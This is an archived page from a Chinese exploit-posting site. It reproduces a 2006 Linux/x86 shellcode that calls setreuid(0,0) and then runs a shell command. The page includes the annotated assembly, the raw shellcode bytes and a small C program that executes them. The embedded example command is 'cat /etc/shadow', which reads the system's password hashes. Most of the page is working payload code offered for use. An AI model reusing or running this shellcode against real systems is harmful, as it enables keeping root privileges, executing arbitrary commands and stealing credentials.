首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

linux/x86 executes command after setreuid (9 40 bytes cmd)


http://www.gipsky.com/
/*
* bunker_exec.c V1.3 - Tue Mar 21 22:50:18 CET 2006
*
* Linux/x86 bytecode that executes command after setreuid
* (9 40 bytes cmd)
*
* setreuid(0, 0) execve("/bin//sh", ["/bin//sh","-c","cmd"], NULL);
*
* "cmd" MUST be terminated with ";" (better with ";exit;" :-D)
*
* bunker - http://rawlab.mindcreations.com
* 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
*
* setreuid(0, 0);
* 00000000 6a46 push byte 0x46
* 00000002 58 pop eax
* 00000003 31db xor ebx,ebx
* 00000005 31c9 xor ecx,ecx
* 00000007 cd80 int 0x80
*
* execve("/bin//sh", ["/bin//sh", "-c", "cmd"], NULL);
* 00000009 eb21 jmp short 0x2c
* 0000000b 5f pop edi
* 0000000c 6a0b push byte 0xb
* 0000000e 58 pop eax
* 0000000f 99 cdq
* 00000010 52 push edx
* 00000011 66682d63 push word 0x632d
* 00000015 89e6 mov esi,esp
* 00000017 52 push edx
* 00000018 682f2f7368 push dword 0x68732f2f
* 0000001d 682f62696e push dword 0x6e69622f
* 00000022 89e3 mov ebx,esp
* 00000024 52 push edx
* 00000025 57 push edi
* 00000026 56 push esi
* 00000027 53 push ebx
* 00000028 89e1 mov ecx,esp
* 0000002a cd80 int 0x80
* 0000002c e8daffffff call 0xb
* 00000031 .... "cmd; exit;"
*/

char sc[]=
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"cat /etc/shadow; exit;";

main() { int(*f)()=(int(*)())sc;f(); }

[2006-08-02]
<< Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local BOF Exploit (2) SaveWeb Portal <= 3.4 (SITE_Path) Remote File Inclusion Vulnerabilities >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号